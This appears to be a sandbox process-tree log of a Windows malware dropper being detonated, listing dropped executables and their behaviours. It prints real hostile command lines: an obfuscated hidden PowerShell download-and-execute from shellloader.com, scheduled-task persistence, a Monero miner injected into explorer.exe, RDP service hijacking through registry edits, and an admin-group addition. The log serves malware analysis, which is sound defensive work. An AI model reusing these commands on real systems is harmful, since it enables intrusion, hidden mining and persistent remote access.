C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun059375dac544fc4a.exeSun059375dac544fc4a.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"10⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth10⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\7844654.exe"C:\ProgramData\7844654.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4438404.exe"C:\ProgramData\4438404.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\1090232.exe"C:\ProgramData\1090232.exe"9⤵
-
C:\ProgramData\1090232.exe"C:\ProgramData\1090232.exe"10⤵
- Executes dropped EXE
-
C:\ProgramData\2177366.exe"C:\ProgramData\2177366.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4100 -s 15329⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8049⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8169⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8689⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8969⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 9569⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 10809⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 9569⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-HG7VD.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-HG7VD.tmp\setup_2.tmp" /SL5="$201F2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-89D6Q.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-89D6Q.tmp\setup_2.tmp" /SL5="$4020A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-KA6Q0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-KA6Q0.tmp\postback.exe" ss112⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss113⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"15⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\ItWOC2Kah.exe"C:\Users\Admin\AppData\Local\Temp\ItWOC2Kah.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ItWOC2Kah.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ItWOC2Kah.exe" & del C:\ProgramData\*.dll & exit15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ItWOC2Kah.exe /f16⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\aMBdCWawc.exe"C:\Users\Admin\AppData\Local\Temp\aMBdCWawc.exe"14⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'15⤵
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1hphrfg\k1hphrfg.cmdline"16⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES275A.tmp" "c:\Users\Admin\AppData\Local\Temp\k1hphrfg\CSC3BB0E230F04042EABAA5CE1D8C5CB15D.TMP"17⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f16⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f16⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f16⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add16⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add17⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr16⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr17⤵
-
C:\Windows\SysWOW64\net.exenet start rdpdr18⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr19⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService16⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService17⤵
-
C:\Windows\SysWOW64\net.exenet start TermService18⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService19⤵
-
C:\Users\Admin\AppData\Local\Temp\TgwME65w9.exe"C:\Users\Admin\AppData\Local\Temp\TgwME65w9.exe"14⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'15⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5grdt0iv\5grdt0iv.cmdline"16⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA247.tmp" "c:\Users\Admin\AppData\Local\Temp\5grdt0iv\CSCDA0F05323C40450EBC3F04B67F7718.TMP"17⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile16⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f16⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f16⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f16⤵
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add16⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add17⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr16⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr17⤵
-
C:\Windows\SysWOW64\net.exenet start rdpdr18⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr19⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService16⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService17⤵
-
C:\Windows\SysWOW64\net.exenet start TermService18⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService19⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05d60bc3b96248e5.exeSun05d60bc3b96248e5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun050462125c7d35.exeSun050462125c7d35.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4078089.exe"C:\ProgramData\4078089.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2308 -s 6168⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\4514517.exe"C:\ProgramData\4514517.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\7679190.exe"C:\ProgramData\7679190.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\7679190.exe"C:\ProgramData\7679190.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 8928⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\2195400.exe"C:\ProgramData\2195400.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05899db881f67fb29.exeSun05899db881f67fb29.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05fa3b4d2ae56e.exeSun05fa3b4d2ae56e.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 6567⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 6447⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 6367⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 6287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 8887⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\D794.exeC:\Users\Admin\AppData\Local\Temp\D794.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3219.exeC:\Users\Admin\AppData\Local\Temp\3219.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3219.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\6pgwbyMucC.exe"C:\Users\Admin\AppData\Local\Temp\6pgwbyMucC.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\72D.exeC:\Users\Admin\AppData\Local\Temp\72D.exe2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Executes dropped EXE
- Loads dropped DLL
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\esvdijbC:\Users\Admin\AppData\Roaming\esvdijb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\esvdijbC:\Users\Admin\AppData\Roaming\esvdijb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\esvdijbC:\Users\Admin\AppData\Roaming\esvdijb2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun054fe19a12cb3.exeSun054fe19a12cb3.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KKM6R.tmp\Sun054fe19a12cb3.tmp"C:\Users\Admin\AppData\Local\Temp\is-KKM6R.tmp\Sun054fe19a12cb3.tmp" /SL5="$60038,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun054fe19a12cb3.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-07TI3.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-07TI3.tmp\46807GHF____.exe" /S /UID=burnerch23⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IG73T.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-IG73T.tmp\ultramediaburner.tmp" /SL5="$6020A,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\08-775bc-42c-56f95-792774b5aae60\Fubytajaefo.exe"C:\Users\Admin\AppData\Local\Temp\08-775bc-42c-56f95-792774b5aae60\Fubytajaefo.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\0a-ccb11-ca1-6859e-b0909820b395a\Jypebapezhe.exe"C:\Users\Admin\AppData\Local\Temp\0a-ccb11-ca1-6859e-b0909820b395a\Jypebapezhe.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20s3czmu.caz\GcleanerEU.exe /eufive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\20s3czmu.caz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\20s3czmu.caz\GcleanerEU.exe /eufive6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exeC:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe /qn CAMPAIGN="654"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631217869 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ho43ozwd.ooz\anyname.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\ho43ozwd.ooz\anyname.exeC:\Users\Admin\AppData\Local\Temp\ho43ozwd.ooz\anyname.exe6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exeC:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxinc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Vidboxinc.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rhce4chj.zof\gcleaner.exe /mixfive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\rhce4chj.zof\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\rhce4chj.zof\gcleaner.exe /mixfive6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\elhaqcgr.2if\autosubplayer.exe /S & exit5⤵
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0A43C04FD5CC380053C4B86A7E404817 C2⤵
- Loads dropped DLL
-
